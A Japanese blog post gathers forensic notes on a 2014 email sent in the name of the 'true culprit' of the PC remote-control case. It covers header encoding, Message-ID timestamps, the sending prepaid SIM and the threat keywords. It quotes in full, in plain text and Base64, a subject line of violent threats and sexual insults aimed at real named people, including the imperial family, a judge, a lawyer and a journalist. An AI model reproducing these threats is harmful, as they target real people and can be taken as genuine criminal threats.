よって、秘密の暴露2は不正ログインをした第三者でも知りえる状況にある為、

犯人しかしる由のない「秘密の暴露」としては成立しないと思われる。

アカウントの変化。今回は『onigoroshijuzo2014』

  • 2012 初回:onigoroshijuzo
  • 2013/1/1〜1/5:onigoroshijuzo2
  • 2014/5/15 今回onigoroshijuzo2014←いまここ

なお、来年版(?)のonigoroshijuzo2015は、現時点では未取得の模様。

※ちなみに、http://profiles.yahoo.co.jp/obokatajuzoというアカウントも存在する模様。

今回のメールとの関連性は不明。


■独特な「三点リーダー」が使われず、正常になった

従来の真犯人の特徴のひとつだった独特な三点リーダー「・・・(全角で3文字)」が、

今回のメールでは一般的な「…(全角一文字)」になっていた。

参考:遠隔操作真犯人の発言集

http://yokoku.in/enkaku2012/enkaku.txt

■件名長すぎ=205文字。何らかの暗号?メッセージ?

皇居にロケット砲を撃ち込んで明仁美智子を始末する地下鉄霞が関駅でサリン散布する大野勝則裁判官と唐沢貴洋弁護士と
狩魔冥検事を上九一色村製AK47で射殺する聖路加病院爆破するお茶の水小学校で小女子喰う悠仁を去勢して天皇制断絶江川
紹子の閉経マンkにVXガス注射してポアするドコモショップ稚内店に牛五十頭突っ込ます
Caroline Kennedy will be killed just like her father

205文字(小文字大文字を1文字とカウント)もある為、たいていのメーラーでは迷惑フィルターに引っかかりメールに分類される。

バイト数(全角を2byte、半角を1byteでカウント)だと351バイト。

何らかの暗号、メッセージが含まれている可能性もある?

コピペ&取り扱い注意。上記の文章は犯行予告が含まれており、掲示板などに転載すると犯行予告をしたとみなされて罪を問われる可能性があります。具体名称は伏せるなどの対策を各自行ってください。

■検証:件名の分断の癖からメーラーが特定できる可能性

http://yokoku.in/enkaku2012/mail20140516_header.txt

メールソースをみるとSubject部分が不自然(?)に分断されている。

Subject:
 =?UTF-8?B?55qH5bGF44Gr44Ot44Kx44OD44OI56Cy44KS5pKD44Gh?=
 =?UTF-8?B?6L6844KT44Gn5piO5LuB576O5pm65a2Q44KS5aeL5pyr44GZ44KL?=
 =?UTF-8?B?5Zyw5LiL6YmE6Zye44GM6Zai6aeF44Gn44K144Oq44Oz5pWj?=
 =?UTF-8?B?5biD44GZ44KL5aSn6YeO5Yud5YmH6KOB5Yik5a6Y44Go5ZSQ5rKi6LK0?=
 =?UTF-8?B?5rSL5byB6K235aOr44Go54up6a2U5Yal5qSc5LqL44KS?=
 =?UTF-8?B?5LiK5Lmd5LiA6Imy5p2R6KO9QUs0N+OBp+WwhOauuuOBmQ==?=
 =?UTF-8?B?44KL6IGW6Lev5Yqg55eF6Zmi54iG56C044GZ44KL44GK6Iy2?=
 =?UTF-8?B?44Gu5rC05bCP5a2m5qCh44Gn5bCP5aWz5a2Q5Zaw44GG5oKg5LuB44KS5Y67?=
 =?UTF-8?B?5Yui44GX44Gm5aSp55qH5Yi25pat57W25rGf5bed57S5?=
 =?UTF-8?B?5a2Q44Gu6ZaJ57WM44Oe44Oza+OBq1ZY44Ks44K55rOo?=
 =?UTF-8?B?5bCE44GX44Gm44Od44Ki44GZ44KL44OJ44Kz44Oi44K344On?=
 =?UTF-8?B?44OD44OX56ia5YaF5bqX44Gr54mb5LqU5Y2B6aCt56qB44Gj6L6844G+44GZ?=
 =?UTF-8?B?Q2Fyb2xpbmUgS2VubmVkeSB3aWxsIGJlIA==?=
 =?UTF-8?B?a2lsbGVkIGp1c3QgbGlrZSBoZXIgZmF0aGVyLg==?=

これはMIMEのEncoderによって、長い文字列は自動的に分断される仕組みによる影響だと思われる。

perlでの検証例。

perlでよく使われるMime::Base64では等間隔で分断されたり、一括で変換されるモジュールなどもある。

少なくともperlではいずれのパターンにも一致しなかったが、完全に一致するライブラリがわかれば、

真犯人が使ったと思われるメーラーを特定できる可能性がある。

暇があるひとは、得意な言語のライブラリ(特にC++あたりが有力候補)でデコードしてみてください。

参考までperlで試したプログラムのソースは下記に設置してます。

http://yokoku.in/enkaku2012/subject_kensho_perl_source.txt

■検証:件名は何かの暗号?件名を忠実にデコードする

件名の分断に何らかの意味があると仮定して、忠実に元の文字にデコードするとこうなる

※実際にはそれぞれの区切りに改行は入っていないので、改行はこちらで区切り事に付け加えたもの

 皇居にロケット砲を撃ち
 込んで明仁美智子を始末する
 地下鉄霞が関駅でサリン散
 布する大野勝則裁判官と唐沢貴
 洋弁護士と狩魔冥検事を
 上九一色村製AK47で射殺す
 る聖路加病院爆破するお茶
 の水小学校で小女子喰う悠仁を去
 勢して天皇制断絶江川紹
 子の閉経マンkにVXガス注
 射してポアするドコモショ
 ップ稚内店に牛五十頭突っ込ます
 Caroline Kennedy will be
 killed just like her father.

参考まで、これを再現したプログラムのソースは下記

http://yokoku.in/enkaku2012/subject_source.txt

■Message-ID:に[@email.android.com]の文字。Andoroid携帯から送信か?

今回のメールのヘッダー情報のMessage-IDに『email.android.com』という文言が含まれていた。

Message-ID: 93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com

このMessage-idは任意で指定ができるので、偽装可能な情報だが、

ストレートにこの記述を解読すると、

『アンドロイド製のメーラーでMessage-IDに"@email.android.com"と付加する

メールクライアントから送信された。』という事が読み取れる。


■Message-IDにメール到着の前日[2014/05/15 17:34:48]のタイムスタンプらしき数値

Message-ID: 93dhqdjpt0hqgushhj9t34q1.1400142888062@email.android.com

『1400142888062』の数値はunixタイム値のミリ秒だと仮定して日時に戻すと

2014/05/15 17:34:48の日時を差している。

 perl -MPOSIX -e 'printf "%s", POSIX::strftime "%Y/%m/%d %H:%M:%S",localtime(1400142888062/1000)'
2014/05/15 17:34:48

何らかの意図をもってこの日時が指定された?メールサーバと日本時間の時差?

メールが届いた時間帯をタイムスタンプに戻すと

perl -MTime::Local -e 'printf "%s", timelocal(13,37,11,16,5-1,2014-1900)'
$ 1400207833

実際の受信日時とこのタイムスタンプとの時間差を求めると、

perl -e 'my$diff=(1400207833 - 1400142888);printf "[%02d:%02d:%02d]\n", ($diff/60/60,($diff/60%60),$diff%60%60) '
[18:02:25]

結果は、真犯人メール到着までの時間差は18:02:25の時間差が示されている。ということになる。

※ただし、あくまで、偽装可能な情報であり、過去に真犯人はExif情報偽装などもしているので、取り扱い要注意。

yahoo!SMTPでMessage-IDの偽装は可能かどうか?の検証

ヤフーのメールサーバでは、Message-IDをなにも指定していない場合は、

自動的にサーバー側で値が割り振られるようだ。

任意のmessage-IDをつけてメールを送信した場合、

今回のメール同様、任意のIDを付与させることができる。

上記の結果から、ヘッダーの位置で、サーバ側が割り振った値か、クライアントがつけたか判断できる。

『赤くて香ばしい』という独特な表現。メール以前に使ってるサイトは?

今回の真犯人の独特な表現『赤くて香ばしい』を真犯人のメール以前に使っているサイトがあるか?

『2014年5月15日より前』 『赤くて香ばしい』でgoogle検索

結果、下記サイトなどがヒットする。

(※この考察はコメ欄、および、嫌儲板の投稿を元に追記ました。情報提供ありがとうございました。)

件名に含まれる犯行予告、キーワードの考察

今回のメールの件名は205文字で構成され、9件の犯行予告に分類できる。

また、それぞれに含まれるキーワード、固有名詞の意味を考察した結果、

皇室関連、オウム真理教関連、遠隔操作事件関連、2chで有名・話題関連に分類できた。

下記が分類の図。

下記ではそれぞれのキーワードについての意味などを調査する。

皇居にロケット砲を撃ち込んで明仁美智子を始末する
地下鉄霞が関駅でサリン散布する
大野勝則裁判官と唐沢貴洋弁護士と狩魔冥検事を上九一色村製AK47で射殺する
聖路加病院爆破する
お茶の水小学校で小女子喰う
悠仁を去勢して天皇制断絶
江川紹子の閉経マンkにVXガス注射してポアする
ドコモショップ稚内店に牛五十頭突っ込ます
Caroline Kennedy will be killed just like her father
明仁
  • 日本の天皇。
美智子
  • 現在の天皇の皇后(正妻の事)。
大野勝則裁判官
  • PC遠隔操作事件担当している裁判長 ソース
唐沢貴洋弁護士
  • 実在する日本の弁護士。一部の2ちゃんねるの板等で頻繁に犯行予告をされる事で有名。
狩魔冥検事
  • 狩魔 冥(かるま めい)はカプコンのゲーム『逆転裁判』シリーズに登場する架空の人物。
上九一色村
  • 山梨県にあった村。オウム真理教事件の施設(サティアン)が過去にあった場所として有名。
AK47
  • 「1947年式カラシニコフ自動小銃」は、1949年にソビエト連邦軍が制式採用した歩兵用アサルトライフル
  • オウム真理教の兵器としては、AK-74(自動小銃)を購入・開発していたとされている。
聖路加病院
  • 正式名称は『聖路加国際病院』。東京都中央区・築地に実在する病院。
  • 地下鉄サリン事件(1995-)の発生時、最寄り駅(築地駅)で最も多くの被害者が発生し、同事件の最大の被害者受け入れ先となった病院としても有名。>ソース
お茶の水小学校
  • 東京にある国立小学校。皇族が入学する学校としても有名。
  • 遠隔操作事件では犯行予告のターゲットにされた。
小女子
悠仁
  • 日本の皇族。秋篠宮文仁親王と同妃紀子の第一子(長男)。
江川紹子
  • 日本のジャーナリスト。オウム事件や遠隔操作事件関連の取材を積極的に行っている事でも有名。
  • ソース
VXガス
ポア
  • オウム真理教が『殺す』の意味で使っていたとして有名。
ドコモショップ稚内店
牛五十頭
  • なぜ牛?50頭の意味合いは何だろう?なんとなくかな?
  • 今回の事件、犯行予告との関連性は不明。
Caroline Kennedy
●メモ
  • 唯一、ドコモショップ『稚内店』の出所がようわからんので気になる!!情報求む。

■メールの配信元 nuro.jp はso-netのプリペイド式のSIMと判明

メールの配信元 mp76f1fa5d.ap.nuro.jp(118.241.250.93)はso-netのプリペイドSIMで間違いない模様。

コメント欄の書き込みによると、本人確認なし、適当な個人情報でも利用可能との事。

プリペイドSIM自体に住所等の入力は求められますが嘘の情報も通ることを確認しています。
店頭購入のみのようですが本人確認してないので特定は厳しいでしょう。

このIPの基地局はどのあたり?契約者は誰?

捜査関係者は早急に発信元IPの割り出しを行うべき。

関連リンク

※この情報は下記の情報を元に記述しています。情報提供ありがとうございました。

http://www.so-net.ne.jp/prepaid/



■本物?摸倣犯?

いまんとこわからん。

■2ちゃんねるの関連スレ一覧

嫌儲:【遠隔操作事件】真犯人「小保方銃蔵」からの秘密暴露メールが公開される ★1〜
ニュース速報+:【遠隔操作事件】真犯人名乗る「小保方銃蔵」からのメール、落合弁護士などに届く★1〜
片山被告 「自作自演と言われるかもしれない ★1〜

■その他メモ(関連リンク、未確認情報など)

以上、ざっくりまとめでしたー。

なにか、お気づきになった方は、コメ欄に投稿おねがいします。m(_ _)m

©satoru.net
Mail Twitter